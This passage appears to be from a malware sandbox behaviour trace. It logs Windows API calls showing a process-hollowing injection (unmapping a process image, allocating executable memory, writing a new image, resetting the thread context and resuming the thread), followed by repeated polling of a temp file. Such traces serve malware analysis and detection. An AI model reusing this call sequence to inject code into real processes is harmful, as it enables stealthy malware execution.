[13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x4748a2, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0066.707] ReadProcessMemory (in: hProcess=0x44c, lpBaseAddress=0x7ffde008, lpBuffer=0xf2ef10, nSize=0x4, lpNumberOfBytesRead=0xf2ef74 | out: lpBuffer=0xf2ef10*, lpNumberOfBytesRead=0xf2ef74*=0x4) returned 1 [0066.707] NtUnmapViewOfSection (ProcessHandle=0x44c, BaseAddress=0x400000) returned 0x0 [0066.708] VirtualAllocEx (hProcess=0x44c, lpAddress=0x400000, dwSize=0x5b000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0066.708] WriteProcessMemory (in: hProcess=0x44c, lpBaseAddress=0x400000, lpBuffer=0x6ba5bd0*, nSize=0x400, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x6ba5bd0*, lpNumberOfBytesWritten=0xf2ef74*=0x400) returned 1 [0066.712] WriteProcessMemory (in: hProcess=0x44c, lpBaseAddress=0x401000, lpBuffer=0x6bfdbf0*, nSize=0x44000, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x6bfdbf0*, lpNumberOfBytesWritten=0xf2ef74*=0x44000) returned 1 [0066.716] WriteProcessMemory (in: hProcess=0x44c, lpBaseAddress=0x445000, lpBuffer=0x331caf4*, nSize=0xbc00, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x331caf4*, lpNumberOfBytesWritten=0xf2ef74*=0xbc00) returned 1 [0066.717] WriteProcessMemory (in: hProcess=0x44c, lpBaseAddress=0x451000, lpBuffer=0x3328700*, nSize=0x1600, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x3328700*, lpNumberOfBytesWritten=0xf2ef74*=0x1600) returned 1 [0066.718] WriteProcessMemory (in: hProcess=0x44c, lpBaseAddress=0x454000, lpBuffer=0x3329d0c*, nSize=0x6a00, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x3329d0c*, lpNumberOfBytesWritten=0xf2ef74*=0x6a00) returned 1 [0066.719] WriteProcessMemory (in: hProcess=0x44c, lpBaseAddress=0x7ffde008, lpBuffer=0x3330718*, nSize=0x4, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x3330718*, lpNumberOfBytesWritten=0xf2ef74*=0x4) returned 1 [0066.720] SetThreadContext (hThread=0x448, lpContext=0x331c81c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x44472e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0066.721] ResumeThread (hThread=0x448) returned 0x1 [0066.722] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0066.722] GetLastError () returned 0x7e [0066.722] SetErrorMode (uMode=0x1) returned 0x0 [0066.722] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0066.722] GetLastError () returned 0x0 [0066.722] GetFileType (hFile=0x458) returned 0x1 [0066.722] SetErrorMode (uMode=0x0) returned 0x1 [0066.722] GetFileType (hFile=0x458) returned 0x1 [0066.723] ReadFile (in: hFile=0x458, lpBuffer=0x33317c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33317c0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0066.723] GetLastError () returned 0x0 [0066.723] CloseHandle (hObject=0x458) returned 1 [0066.724] GetLastError () returned 0x0 [0067.869] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0067.869] GetLastError () returned 0x0 [0067.869] SetErrorMode (uMode=0x1) returned 0x0 [0067.870] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0067.870] GetLastError () returned 0x0 [0067.870] GetFileType (hFile=0x458) returned 0x1 [0067.870] SetErrorMode (uMode=0x0) returned 0x1 [0067.870] GetFileType (hFile=0x458) returned 0x1 [0067.870] ReadFile (in: hFile=0x458, lpBuffer=0x33336b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33336b0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0067.870] GetLastError () returned 0x0 [0067.870] CloseHandle (hObject=0x458) returned 1 [0067.871] GetLastError () returned 0x0 [0068.886] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0068.886] GetLastError () returned 0x0 [0068.886] SetErrorMode (uMode=0x1) returned 0x0 [0068.886] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0068.886] GetLastError () returned 0x0 [0068.886] GetFileType (hFile=0x458) returned 0x1 [0068.886] SetErrorMode (uMode=0x0) returned 0x1 [0068.886] GetFileType (hFile=0x458) returned 0x1 [0068.886] ReadFile (in: hFile=0x458, lpBuffer=0x33355a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33355a0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0068.886] GetLastError () returned 0x0 [0068.886] CloseHandle (hObject=0x458) returned 1 [0068.886] GetLastError () returned 0x0 [0069.902] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0069.902] GetLastError () returned 0x0 [0069.902] SetErrorMode (uMode=0x1) returned 0x0 [0069.902] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0069.902] GetLastError () returned 0x0 [0069.902] GetFileType (hFile=0x458) returned 0x1 [0069.902] SetErrorMode (uMode=0x0) returned 0x1 [0069.902] GetFileType (hFile=0x458) returned 0x1 [0069.902] ReadFile (in: hFile=0x458, lpBuffer=0x3337490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3337490*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0069.902] GetLastError () returned 0x0 [0069.902] ReadFile (in: hFile=0x458, lpBuffer=0x3337490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3337490*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0069.902] GetLastError () returned 0x0 [0069.902] CloseHandle (hObject=0x458) returned 1 [0069.902] GetLastError () returned 0x0 [0070.917] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0070.917] GetLastError () returned 0x0 [0070.917] SetErrorMode (uMode=0x1) returned 0x0 [0070.917] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0070.918] GetLastError () returned 0x0 [0070.918] GetFileType (hFile=0x458) returned 0x1 [0070.918] SetErrorMode (uMode=0x0) returned 0x1 [0070.918] GetFileType (hFile=0x458) returned 0x1 [0070.918] ReadFile (in: hFile=0x458, lpBuffer=0x33397f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33397f0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0070.918] 